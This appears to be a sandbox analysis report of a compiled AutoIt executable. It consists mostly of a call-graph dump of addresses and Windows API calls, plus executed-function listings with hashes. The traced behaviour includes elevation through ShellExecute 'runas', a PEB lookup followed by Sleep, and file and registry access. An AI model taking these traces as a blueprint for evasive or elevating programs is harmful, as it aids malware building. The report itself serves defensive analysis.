87825->87835 87840 4090ea 87825->87840 88085 4534e3 52 API calls 87825->88085 88087 40c4e0 194 API calls 87825->88087 88094 45e737 90 API calls 3 library calls 87827->88094 87828->87832 87829 42c491 87829->87832 88090 45e737 90 API calls 3 library calls 87829->88090 87830 42c4da 87830->87832 88092 45e737 90 API calls 3 library calls 87830->88092 87831->87827 87838 40912b 87831->87838 87832->86831 88093 45e737 90 API calls 3 library calls 87833->88093 87835->87840 87841 408e80 VariantClear 87835->87841 87838->87832 88084 403e10 53 API calls 87838->88084 87842 408f40 VariantClear 87840->87842 87841->87840 87842->87832 87844 40914b 87845 408f40 VariantClear 87844->87845 87845->87832 88095 408d90 87846->88095 87848 408cf9 87849 429778 87848->87849 87852 42976c 87848->87852 87854 408d2d 87848->87854 88124 410c60 VariantClear ctype 87849->88124 87851 429780 88123 45e737 90 API calls 3 library calls 87852->88123 88111 403d10 87854->88111 87857 408d71 ctype 87857->86831 87858 408f40 VariantClear 87859 408d45 ctype 87858->87859 87859->87857 87859->87858 87861 4096c6 _wcslen 87860->87861 87862 40a70c ctype _memmove 87861->87862 87863 4115d7 52 API calls 87861->87863 87866 4013a0 52 API calls 87862->87866 87864 4096fa _memmove 87863->87864 87865 4115d7 52 API calls 87864->87865 87867 40971b 87865->87867 87868 4297aa 87866->87868 87867->87862 87869 409749 CharUpperBuffW 87867->87869 87873 40976a ctype 87867->87873 87870 4115d7 52 API calls 87868->87870 87869->87873 87872 4297d1 _memmove 87870->87872 88430 45e737 90 API calls 3 library calls 87872->88430 87880 4097e5 ctype 87873->87880 88404 47dcbb 196 API calls 87873->88404 87875 408f40 VariantClear 87876 42ae92 87875->87876 88431 410c60 VariantClear ctype 87876->88431 87878 42aea4 87879 409aa2 87879->87872 87882 4115d7 52 API calls 87879->87882 87886 409afe 87879->87886 87880->87872 87880->87879 87881 40a689 87880->87881 87883 4115d7 52 API calls 87880->87883 87885 40c2c0 52 API calls 87880->87885 87889 40a6af ctype _memmove 87880->87889 87892 429a46 VariantClear 87880->87892 87895 408f40 VariantClear 87880->87895 87912 4299d9 87880->87912 87915 429abd 87880->87915 87923 40a780 194 API calls 87880->87923 87929 42a452 87880->87929 88405 40c4e0 194 API calls 87880->88405 88407 40ba10 52 API calls 2 library calls 87880->88407 88408 40e270 VariantClear ctype 87880->88408 87884 4115d7 52 API calls 87881->87884 87882->87886 87883->87880 87884->87889 87885->87880 87887 409b2a 87886->87887 87888 4115d7 52 API calls 87886->87888 87890 429dbe 87887->87890 87946 409b4d ctype _memmove 87887->87946 88412 40b400 VariantClear VariantClear ctype 87887->88412 87891 429d31 87888->87891 87910 4115d7 52 API calls 87889->87910 87897 429dd3 87890->87897 88413 40b400 VariantClear VariantClear ctype 87890->88413 87894 429d42 87891->87894 88409 44a801 52 API calls 87891->88409 87892->87880 87902 40e0a0 52 API calls 87894->87902 87895->87880 87897->87946 88414 40e1c0 VariantClear ctype 87897->88414 87899 40a045 87900 4115d7 52 API calls 87899->87900 87905 40a04c 87900->87905 87906 429d57 87902->87906 87911 40a0a7 87905->87911 87914 4091e0 317 API calls 87905->87914 88410 453443 52 API calls 87906->88410 87908 42a42f 88418 45e737 90 API calls 3 library calls 87908->88418 87910->87862 87932 40a0af 87911->87932 88419 40c790 VariantClear ctype 87911->88419 87916 408f40 VariantClear 87912->87916 87914->87911 87915->86831 87918 4299e2 87916->87918 87917 429d88 88411 453443 52 API calls 87917->88411 88406 410c60 VariantClear ctype 87918->88406 87923->87880 87925 4115d7 52 API calls 87925->87946 87926 44a801 52 API calls 87926->87946 87928 408f40 VariantClear 87960 40a162 ctype _memmove 87928->87960 87929->87875 87930 41130a 51 API calls __cinit 87930->87946 87931 402780 52 API calls 87931->87946 87933 40a11b 87932->87933 87934 42a4b4 VariantClear 87932->87934 87932->87960 87940 40a12d ctype 87933->87940 88420 40e270 VariantClear ctype 87933->88420 87934->87940 87935 40a780 194 API calls 87935->87946 87937 401980 53 API calls 87937->87946 87938 408e80 VariantClear 87938->87946 87939 4115d7 52 API calls 87939->87960 87940->87939 87940->87960 87941 408e80 VariantClear 87941->87960 87943 42a74d VariantClear 87943->87960 87944 40a368 87947 42aad4 87944->87947 87955 40a397 87944->87955 87945 42a3f5 88417 47390f VariantClear 87945->88417 87946->87862 87946->87908 87946->87925 87946->87926 87946->87930 87946->87931 87946->87935 87946->87937 87946->87938 87946->87945 87948 409fd2 87946->87948 87952 409c95 87946->87952 88415 45f508 52 API calls 87946->88415 88416 403e10 53 API calls 87946->88416 88423 46fe90 VariantClear VariantClear ctype 87947->88423 87948->87899 87948->87945 87949 42a886 VariantClear 87949->87960 87950 42a7e4 VariantClear 87950->87960 87952->86831 87953 40a3ce 87964 40a3d9 ctype 87953->87964 88424 40b400 VariantClear VariantClear ctype 87953->88424 87954 40e270 VariantClear 87954->87960 87955->87953 87980 40a42c ctype 87955->87980 88403 40b400 VariantClear VariantClear ctype 87955->88403 87958 42abaf 87962 42abd4 VariantClear 87958->87962 87971 40a4ee ctype 87958->87971 87959 4115d7 52 API calls 87963 42a5a6 VariantInit VariantCopy 87959->87963 87960->87928 87960->87941 87960->87943 87960->87944 87960->87947 87960->87949 87960->87950 87960->87954 87960->87959 87967 4115d7 52 API calls 87960->87967 88421 470870 52 API calls 87960->88421 88422 44ccf1 VariantClear ctype 87960->88422 87961 40a4dc 87961->87971 88426 40e270 VariantClear ctype 87961->88426 87962->87971 87963->87960 87966 42a5c6 VariantClear 87963->87966 87965 40a41a 87964->87965 87973 42ab44 VariantClear 87964->87973 87964->87980 87965->87980 88425 40e270 VariantClear ctype 87965->88425 87966->87960 87967->87960 87968 42ac4f 87974 42ac79 VariantClear 87968->87974 87978 40a546 ctype 87968->87978 87971->87968 87972 40a534 87971->87972 87972->87978 88427 40e270 VariantClear ctype 87972->88427 87973->87980 87974->87978 87975 42ad28 87981 42ad4e VariantClear 87975->87981 87986 40a583 ctype 87975->87986 87978->87975 87979 40a571 87978->87979 87979->87986 88428 40e270 VariantClear ctype 87979->88428 87980->87958 87980->87961 87981->87986 87983 40a650 ctype 87983->86831 87984 42ae0e VariantClear 87984->87986 87986->87983 87986->87984 88429 40e270 VariantClear ctype 87986->88429 87987->86831 87988->86831 87989->86831 87990->86782 87991->86787 87992->86831 87993->86831 87994->86831 87995->86831 87996->86839 87997->86839 87998->86839 87999->86839 88000->86839 88001->86839 88002->86839 88004 403cdf 88003->88004 88005 408f40 VariantClear 88004->88005 88006 403ce7 88005->88006 88006->86826 88007->86839 88008->86839 88009->86831 88010->86779 88012 408e88 88011->88012 88014 408e94 88011->88014 88013 408f40 VariantClear 88012->88013 88013->88014 88015 45340c 85 API calls 88014->88015 88015->87744 88016->87748 88017->87750 88018->87752 88019->87736 88020->87728 88021->87764 88022->87761 88023->87782 88024->87774 88025->87728 88027 40a7a6 88026->88027 88028 40ae8c 88026->88028 88030 4115d7 52 API calls 88027->88030 88069 41130a 51 API calls __cinit 88028->88069 88063 40a7c6 ctype _memmove 88030->88063 88031 40a86d 88032 40a878 ctype 88031->88032 88033 40abd1 88031->88033 88036 40a884 ctype 88032->88036 88039 408f40 VariantClear 88032->88039 88074 45e737 90 API calls 3 library calls 88033->88074 88034 401b10 52 API calls 88034->88063 88036->87782 88037 408e80 VariantClear 88037->88063 88038 42b791 VariantClear 88038->88063 88039->88032 88040 42ba2d VariantClear 88040->88063 88041 42b459 VariantClear 88041->88063 88042 42bb6a 88077 44b92d VariantClear 88042->88077 88043 40e270 VariantClear 88043->88063 88044 42b6f6 VariantClear 88044->88063 88045 40bc10 53 API calls 88045->88063 88046 408cc0 187 API calls 88046->88063 88048 42bc5b 88048->87782 88049 4115d7 52 API calls 88049->88063 88050 42bbf5 88075 45e737 90 API calls 3 library calls 88050->88075 88051 4115d7 52 API calls 88055 42b5b3 VariantInit VariantCopy 88051->88055 88052 40b5f0 89 API calls 88052->88063 88054 408f40 VariantClear 88054->88063 88057 42b5d7 VariantClear 88055->88057 88055->88063 88057->88063 88060 42bc37 88076 45e737 90 API calls 3 library calls 88060->88076 88063->88031 88063->88033 88063->88034 88063->88037 88063->88038 88063->88040 88063->88041 88063->88042 88063->88043 88063->88044 88063->88045 88063->88046 88063->88049 88063->88050 88063->88051 88063->88052 88063->88054 88063->88060 88066 4530c9 VariantClear 88063->88066 88070 45308a 53 API calls 88063->88070 88071 470870 52 API calls 88063->88071 88072 457f66 87 API calls __write_nolock 88063->88072 88073 472f47 127 API calls 88063->88073 88064 42bc48 88064->88042 88065 408f40 VariantClear 88064->88065 88065->88042 88066->88063 88067->87769 88068->87773 88069->88063 88070->88063 88071->88063 88072->88063 88073->88063 88074->88042 88075->88042 88076->88064 88077->88048 88078->87789 88079->87792 88080->87804 88081->87806 88082->87797 88083->87825 88084->87844 88085->87825 88086->87832 88087->87825 88088->87832 88089->87829 88090->87832 88091->87830 88092->87832 88093->87832 88094->87823 88096 4289d2 88095->88096 88097 408db3 88095->88097 88127 45e737 90 API calls 3 library calls 88096->88127 88125 40bec0 90 API calls 88097->88125 88100 4289e5 88128 45e737 90 API calls 3 library calls 88100->88128 88101 408e5a 88101->87848 88104 428a05 88106 408f40 VariantClear 88104->88106 88105 408dc9 88105->88100 88105->88101 88105->88104 88107 40a780 194 API calls 88105->88107 88108 408e64 88105->88108 88110 408f40 VariantClear 88105->88110 88126 40ba10 52 API calls 2 library calls 88105->88126 88106->88101 88107->88105 88109 408f40 VariantClear 88108->88109 88109->88101 88110->88105 88112 408f40 VariantClear 88111->88112 88113 403d20 88112->88113 88114 403cd0 VariantClear 88113->88114 88115 403d4d 88114->88115 88118 4013c0 52 API calls 88115->88118 88129 45e17d 88115->88129 88139 4755ad 88115->88139 88142 467897 88115->88142 88186 40de10 88115->88186 88191 46e91c 88115->88191 88116 403d76 88116->87849 88116->87859 88118->88116 88123->87849 88124->87851 88125->88105 88126->88105 88127->88100 88128->88104 88130 45e198 88129->88130 88131 45e19c 88130->88131 88132 45e1b8 88130->88132 88133 408f40 VariantClear 88131->88133 88134 45e1cc 88132->88134 88135 45e1db FindClose 88132->88135 88136 45e1a4 88133->88136 88137 45e1d9 ctype 88134->88137 88194 44ae3e 88134->88194 88135->88137 88136->88116 88137->88116 88207 475077 88139->88207 88141 4755c0 88141->88116 88143 4678bb 88142->88143 88172 467954 88143->88172 88325 45340c 85 API calls 88143->88325 88144 4115d7 52 API calls 88145 467989 88144->88145 88147 467995 88145->88147 88329 40da60 53 API calls 88145->88329 88151 4533eb 85 API calls 88147->88151 88148 4678f6 88150 413a0e __wsplitpath 46 API calls 88148->88150 88152 4678fc 88150->88152 88153 4679b7 88151->88153 88154 401b10 52 API calls 88152->88154 88313 40de40 88153->88313 88156 46790c 88154->88156 88326 40d200 52 API calls 2 library calls 88156->88326 88159 4679c7 GetLastError 88162 403cd0 VariantClear 88159->88162 88160 467a05 88163 467a2c 88160->88163 88164 467a4b 88160->88164 88161 467917 88161->88172 88327 4339fa GetFileAttributesW FindFirstFileW FindClose 88161->88327 88165 4679dc 88162->88165 88167 4115d7 52 API calls 88163->88167 88168 4115d7 52 API calls 88164->88168 88169 4679e6 88165->88169 88176 44ae3e CloseHandle 88165->88176 88174 467a31 88167->88174 88175 467a49 88168->88175 88170 467928 88170->88172 88177 46792f 88170->88177 88172->88144 88173 467964 88172->88173 88173->88116 88176->88169 88328 4335cd 56 API calls 3 library calls 88177->88328 88182 467939 88182->88172 88184 408f40 VariantClear 88182->88184 88185 467947 88184->88185 88185->88172 88187 4115d7 52 API calls 88186->88187 88188 40de23 88187->88188 88189 40da20 CloseHandle 88188->88189 88190 40de2e 88189->88190 88190->88116 88343 46e785 88191->88343 88193 46e92f 88193->88116 88195 44ae4b ctype 88194->88195 88197 443fdf 88194->88197 88195->88137 88202 40da20 88197->88202 88199 443feb 88206 4340db CloseHandle ctype 88199->88206 88201 444001 88201->88195 88203 40da37 88202->88203 88204 40da29 88202->88204 88203->88204 88205 40da3c CloseHandle 88203->88205 88204->88199 88205->88199 88206->88201 88260 4533eb 88207->88260 88210 4750ee 88213 408f40 VariantClear 88210->88213 88211 475129 88264 4646e0 88211->88264 88218 4750f5 88213->88218 88214 47515e 88215 475162 88214->88215 88253 47518e 88214->88253 88216 408f40 VariantClear 88215->88216 88247 475169 88216->88247 88217 475357 88219 475365 88217->88219 88220 4754ea 88217->88220 88218->88141 88298 44b3ac 57 API calls 88219->88298 88304 464812 92 API calls 88220->88304 88224 4754fc 88225 475374 88224->88225 88227 475508 88224->88227 88277 430d31 88225->88277 88226 4533eb 85 API calls 88226->88253 88228 408f40 VariantClear 88227->88228 88231 47550f 88228->88231 88231->88247 88232 475388 88284 4577e9 88232->88284 88235 475480 88237 408f40 VariantClear 88235->88237 88237->88247 88245 4754b5 88246 408f40 VariantClear 88245->88246 88246->88247 88247->88141 88253->88217 88253->88226 88253->88235 88253->88245 88253->88253 88296 436299 52 API calls 2 library calls 88253->88296 88297 463ad5 64 API calls __wcsicoll 88253->88297 88261 453404 88260->88261 88262 4533f8 88260->88262 88261->88210 88261->88211 88262->88261 88307 4531b1 85 API calls 5 library calls 88262->88307 88308 4536f7 53 API calls 88264->88308 88266 4646fc 88309 4426cd 59 API calls _wcslen 88266->88309 88268 464711 88270 40bc70 52 API calls 88268->88270 88276 46474b 88268->88276 88271 46472c 88270->88271 88310 461465 52 API calls _memmove 88271->88310 88273 464741 88274 40c600 52 API calls 88273->88274 88274->88276 88275 464793 88275->88214 88276->88275 88311 463ad5 64 API calls __wcsicoll 88276->88311 88278 430db2 88277->88278 88279 430d54 88277->88279 88278->88232 88280 4115d7 52 API calls 88279->88280 88281 430d74 88280->88281 88282 430da9 88281->88282 88283 4115d7 52 API calls 88281->88283 88282->88232 88283->88281 88285 457a84 88284->88285 88291 45780c _strcat _wcslen _wcscpy ctype 88284->88291 88286 443006 57 API calls 88286->88291 88288 4135bb 46 API calls _malloc 88288->88291 88289 45340c 85 API calls 88289->88291 88290 40f6f0 54 API calls 88290->88291 88291->88285 88291->88286 88291->88288 88291->88289 88291->88290 88312 44b3ac 57 API calls 88291->88312 88296->88253 88297->88253 88298->88225 88304->88224 88307->88261 88308->88266 88309->88268 88310->88273 88311->88275 88312->88291 88314 40da20 CloseHandle 88313->88314 88315 40de4e 88314->88315 88331 40f110 88315->88331 88318 4264fa 88320 40de84 88340 40e080 SetFilePointerEx SetFilePointerEx 88320->88340 88322 40de8b 88341 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88322->88341 88324 40de90 88324->88159 88324->88160 88325->88148 88326->88161 88327->88170 88328->88182 88329->88147 88332 40f125 CreateFileW 88331->88332 88333 42630c 88331->88333 88335 40de74 88332->88335 88334 426311 CreateFileW 88333->88334 88333->88335 88334->88335 88336 426337 88334->88336 88335->88318 88339 40dea0 55 API calls ctype 88335->88339 88342 40df90 SetFilePointerEx SetFilePointerEx 88336->88342 88338 426342 88338->88335 88339->88320 88340->88322 88341->88324 88342->88338 88344 46e7a2 88343->88344 88345 4115d7 52 API calls 88344->88345 88346 46e802 88344->88346 88348 46e7ad 88345->88348 88347 46e7e5 88346->88347 88356 46e82f 88346->88356 88350 408f40 VariantClear 88347->88350 88349 46e7b9 88348->88349 88391 40da60 53 API calls 88348->88391 88352 4533eb 85 API calls 88349->88352 88353 46e7ea 88350->88353 88354 46e7ca 88352->88354 88353->88193 88357 40de40 60 API calls 88354->88357 88355 46e8b5 88384 4680ed 88355->88384 88356->88355 88358 46e845 88356->88358 88359 46e7d7 88357->88359 88361 4533eb 85 API calls 88358->88361 88359->88356 88362 46e7db 88359->88362 88371 46e84b 88361->88371 88362->88347 88365 44ae3e CloseHandle 88362->88365 88363 46e8bb 88388 443fbe 88363->88388 88364 46e87a 88392 4689f4 59 API calls 88364->88392 88365->88347 88368 46e883 88370 4013c0 52 API calls 88368->88370 88372 46e88f 88370->88372 88371->88364 88371->88368 88374 40e0a0 52 API calls 88372->88374 88373 408f40 VariantClear 88382 46e881 88373->88382 88375 46e899 88374->88375 88393 40d200 52 API calls 2 library calls 88375->88393 88377 46e911 88377->88193 88378 46e8a5 88394 4689f4 59 API calls 88378->88394 88379 40da20 CloseHandle 88381 46e903 88379->88381 88383 44ae3e CloseHandle 88381->88383 88382->88377 88382->88379 88383->88377 88385 468100 88384->88385 88386 4680fa 88384->88386 88385->88363 88395 467ac4 55 API calls 2 library calls 88386->88395 88396 443e36 88388->88396 88390 443fd3 88390->88373 88390->88382 88391->88349 88392->88382 88393->88378 88394->88382 88395->88385 88399 443e19 88396->88399 88400 443e26 88399->88400 88401 443e32 WriteFile 88399->88401 88402 443db4 SetFilePointerEx SetFilePointerEx 88400->88402 88401->88390 88402->88401 88403->87953 88404->87873 88405->87880 88406->87983 88407->87880 88408->87880 88409->87894 88410->87917 88411->87887 88412->87890 88413->87897 88414->87946 88415->87946 88416->87946 88417->87908 88418->87929 88419->87911 88420->87940 88421->87960 88422->87960 88423->87953 88424->87964 88425->87980 88426->87971 88427->87978 88428->87986 88429->87986 88430->87929 88431->87878 88432 42d154 88436 480a8d 88432->88436 88434 42d161 88435 480a8d 194 API calls 88434->88435 88435->88434 88437 480ae4 88436->88437 88438 480b26 88436->88438 88440 480aeb 88437->88440 88441 480b15 88437->88441 88439 40bc70 52 API calls 88438->88439 88462 480b2e 88439->88462 88443 480aee 88440->88443 88444 480b04 88440->88444 88469 4805bf 194 API calls 88441->88469 88443->88438 88445 480af3 88443->88445 88468 47fea2 194 API calls __itow_s 88444->88468 88467 47f135 194 API calls 88445->88467 88447 40e0a0 52 API calls 88447->88462 88449 408f40 VariantClear 88452 481156 88449->88452 88451 480aff 88451->88449 88453 408f40 VariantClear 88452->88453 88454 48115e 88453->88454 88454->88434 88455 401980 53 API calls 88455->88462 88457 40c2c0 52 API calls 88457->88462 88458 40e710 53 API calls 88458->88462 88459 40a780 194 API calls 88459->88462 88461 408e80 VariantClear 88461->88462 88462->88447 88462->88451 88462->88455 88462->88457 88462->88458 88462->88459 88462->88461 88463 480ff5 88462->88463 88470 45377f 52 API calls 88462->88470 88471 45e951 53 API calls 88462->88471 88472 40e830 53 API calls 88462->88472 88473 47925f 53 API calls 88462->88473 88474 47fcff 194 API calls 88462->88474 88475 45e737 90 API calls 3 library calls 88463->88475 88467->88451 88468->88451 88469->88451 88470->88462 88471->88462 88472->88462 88473->88462 88474->88462 88475->88451 88476 42093c8 88477 4207018 GetPEB 88476->88477 88478 42094ae 88477->88478 88490 42092b8 88478->88490 88491 42092c1 Sleep 88490->88491 88492 42092cf 88491->88492 88493 42b14b 88500 40bc10 88493->88500 88495 42b159 88496 4096a0 331 API calls 88495->88496 88497 42b177 88496->88497 88511 44b92d VariantClear 88497->88511 88499 42bc5b 88501 40bc24 88500->88501 88502 40bc17 88500->88502 88504 40bc2a 88501->88504 88505 40bc3c 88501->88505 88503 408e80 VariantClear 88502->88503 88507 40bc1f 88503->88507 88508 408e80 VariantClear 88504->88508 88506 4115d7 52 API calls 88505->88506 88510 40bc43 88506->88510 88507->88495 88509 40bc33 88508->88509 88509->88495 88510->88495 88511->88499 88512 425b2b 88517 40f000 88512->88517 88516 425b3a 88518 4115d7 52 API calls 88517->88518 88519 40f007 88518->88519 88520 4276ea 88519->88520 88526 40f030 88519->88526 88525 41130a 51 API calls __cinit 88525->88516 88527 40f039 88526->88527 88528 40f01a 88526->88528 88556 41130a 51 API calls __cinit 88527->88556 88530 40e500 88528->88530 88531 40bc70 52 API calls 88530->88531 88532 40e515 GetVersionExW 88531->88532 88533 402160 52 API calls 88532->88533 88534 40e557 88533->88534 88557 40e660 88534->88557 88541 427674 88544 4276c6 GetSystemInfo 88541->88544 88542 40e5e0 88546 4276d5 GetSystemInfo 88542->88546 88571 40efd0 88542->88571 88543 40e5cd GetCurrentProcess 88578 40ef20 LoadLibraryA GetProcAddress 88543->88578 88544->88546 88549 40e629 88575 40ef90 88549->88575 88552 40e641 FreeLibrary 88553 40e644 88552->88553 88554 40e653 FreeLibrary 88553->88554 88555 40e656 88553->88555 88554->88555 88555->88525 88556->88528 88558 40e667 88557->88558 88559 42761d 88558->88559 88560 40c600 52 API calls 88558->88560 88561 40e55c 88560->88561 88562 40e680 88561->88562 88563 40e687 88562->88563 88564 427616 88563->88564 88565 40c600 52 API calls 88563->88565 88566 40e566 88565->88566 88566->88541 88567 40ef60 88566->88567 88568 40e5c8 88567->88568 88569 40ef66 LoadLibraryA 88567->88569 88568->88542 88568->88543 88569->88568 88570 40ef77 GetProcAddress 88569->88570 88570->88568 88572 40e620 88571->88572 88573 40efd6 LoadLibraryA 88571->88573 88572->88544 88572->88549 88573->88572 88574 40efe7 GetProcAddress 88573->88574 88574->88572 88579 40efb0 LoadLibraryA GetProcAddress 88575->88579 88577 40e632 GetNativeSystemInfo 88577->88552 88577->88553 88578->88542 88579->88577 88580 425b5e 88585 40c7f0 88580->88585 88584 425b6d 88620 40db10 52 API calls 88585->88620 88587 40c82a 88621 410ab0 6 API calls 88587->88621 88589 40c86d 88590 40bc70 52 API calls 88589->88590 88591 40c877 88590->88591 88592 40bc70 52 API calls 88591->88592 88593 40c881 88592->88593 88594 40bc70 52 API calls 88593->88594 88595 40c88b 88594->88595 88596 40bc70 52 API calls 88595->88596 88597 40c8d1 88596->88597 88598 40bc70 52 API calls 88597->88598 88599 40c991 88598->88599 88622 40d2c0 52 API calls 88599->88622 88601 40c99b 88623 40d0d0 53 API calls 88601->88623 88603 40c9c1 88604 40bc70 52 API calls 88603->88604 88605 40c9cb 88604->88605 88624 40e310 53 API calls 88605->88624 88607 40ca28 88608 408f40 VariantClear 88607->88608 88609 40ca30 88608->88609 88610 408f40 VariantClear 88609->88610 88611 40ca38 GetStdHandle 88610->88611 88612 429630 88611->88612 88613 40ca87 88611->88613 88612->88613 88614 429639 88612->88614 88619 41130a 51 API calls __cinit 88613->88619 88625 4432c0 57 API calls 88614->88625 88616 429641 88626 44b6ab CreateThread 88616->88626 88618 42964f CloseHandle 88618->88613 88619->88584 88620->88587 88621->88589 88622->88601 88623->88603 88624->88607 88625->88616 88626->88618 88627 44b5cb 58 API calls 88626->88627 88628 425b6f 88633 40dc90 88628->88633 88632 425b7e 88634 40bc70 52 API calls 88633->88634 88635 40dd03 88634->88635 88641 40f210 88635->88641 88637 40dd96 88638 40ddb7 88637->88638 88644 40dc00 52 API calls 2 library calls 88637->88644 88640 41130a 51 API calls __cinit 88638->88640 88640->88632 88645 40f250 RegOpenKeyExW 88641->88645 88643 40f230 88643->88637 88644->88637 88646 425e17 88645->88646 88647 40f275 RegQueryValueExW 88645->88647 88646->88643 88648 40f2c3 RegCloseKey 88647->88648 88649 40f298 88647->88649 88648->88643 88650 40f2a9 RegCloseKey 88649->88650 88651 425e1d 88649->88651 88650->88643

                                                                                                                    Executed Functions

                                                                                                                    Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 004096C1
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • _memmove.LIBCMT ref: 0040970C
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                    • _memmove.LIBCMT ref: 00409D96
                                                                                                                    • _memmove.LIBCMT ref: 0040A6C4
                                                                                                                    • _memmove.LIBCMT ref: 004297E5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2383988440-0
                                                                                                                    • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                                    • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                    • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                                    • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                                                                    Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                      • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                                      • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                    • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                      • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                    • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                    • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                      • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                      • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                      • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                      • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                      • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                    Strings
                                                                                                                    • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                                                    • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
